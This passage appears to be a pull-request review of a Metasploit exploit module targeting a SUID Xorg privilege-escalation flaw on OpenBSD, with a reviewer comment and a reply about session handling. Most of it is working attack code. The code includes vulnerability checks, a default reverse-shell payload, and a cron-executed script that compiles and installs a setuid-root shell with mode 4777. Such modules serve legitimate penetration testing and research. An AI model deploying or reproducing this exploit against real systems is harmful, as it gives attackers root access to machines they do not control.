modules/exploits/openbsd/local/xorg_x11_suid_server.rb

```diff
@@ -0,0 +1,190 @@
+      'SessionTypes'   =>    'shell',
+      'Targets'        =>
+        [
+           ['OpenBSD', {
+            'Platform' => 'unix',
+            'Arch' => [ ARCH_CMD ] } ]
+        ],
+      'DefaultOptions' =>
+        {
+          'PAYLOAD' => 'cmd/unix/reverse_openssl'
+        },
+
+      'DefaultTarget'  => 0))
+    register_options(
+      [
+        OptString.new('PAYLOAD_LOC', [ true, 'SUID binary to create', '/usr/local/bin/shell' ]),
+        OptBool.new('BUILTIN', [ true, 'Privesc in current session', true ])
+      ])
+     register_advanced_options(
+      [
+         OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+         OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ])
+      ]
+    )
+  end
+
+
+  def check
+    #suid program check
+    xorg_path = cmd_exec("which Xorg")
+    unless xorg_path.include?("Xorg")
+      vprint_good "Xorg path was: #{xorg_path}"
+      return CheckCode::Safe
+    end
+    vprint_good "Xorg path found at #{xorg_path}"
+    unless setuid? xorg_path
+      vprint_error "Xorg binary #{xorg_path} is not SUID"
+      return CheckCode::Safe
+    end
+    vprint_good "Xorg binary #{xorg_path} is SUID"
+
+    #version check
+    x_version = cmd_exec("Xorg -version")
+    v = Gem::Version.new(x_version.scan(/\d.\d+.\d/).first)
+    unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.3'))
+      fail_with Failure::NotVulnerable, "Xorg version #{v} not supported"
+    end
+    vprint_good "Xorg version #{v} is vulnerable"
+
+    #process check
+    proc_list = []
+    proc_list = cmd_exec("ps ax")
+    if proc_list.include?('X')
+      vprint_warning('Xorg in process list. Can you stop it?')
+      return CheckCode::Safe
+    else
+      vprint_good('Xorg does not appear running')
+      return CheckCode::Detected
+    end
+  end
+
+
+  def exploit
+    check_status = check
+    unless check_status == CheckCode::Detected
+       fail_with Failure::NotVulnerable, 'Target not vulnerable'
+    end
+    if is_root?
+      fail_with Failure::BadConfig, 'This session already has root privileges'
+    end
+
+    xdisplay = datastore['Xdisplay']
+    builtin_only = datastore['BUILTIN']
+    payload_path = datastore['PAYLOAD_LOC']
+    pscript = "#{datastore['WritableDir']}/.session-#{rand_text_alphanumeric 5..10}"
+    payload_c = "#{pscript}.c"
+
+    #Making file crontab will run
+    cron_script = ''
+    if builtin_only == false
+      print_status 'Uploading your payload'
+      cron_script << payload.encoded.gsub('"', '\"').gsub('$', '\$')
+      write_file(pscript,cron_script)
+      vprint_status cron_script
+    else
+      print_good 'Attempting privesc within current session'
+      cron_script << "cp /bin/sh #{payload_path}\n"
+      cron_script << "gcc #{payload_c} -o #{payload_path}\n"
+      cron_script << "chmod 4777 #{payload_path}\n"
+      suid_c = 'main(){setuid(0);setgid(0);system("/bin/sh");}'
```

Comment:
Attempting to privesc "within current session" is generally avoided where possible. Also, it won't work on Meterpreter sessions. Modules in the `exploit/**/local` directory are designed to return a new session.

You should be able to replace `"/bin/sh"` with the path to an uploaded payload. In which case, the `builtin_only` dichotomy becomes pointless and should instead be replace with multiple module `targets`.

Reply:
As per OOB discussions, elevating an existing session is acceptable. Marking this as resolved.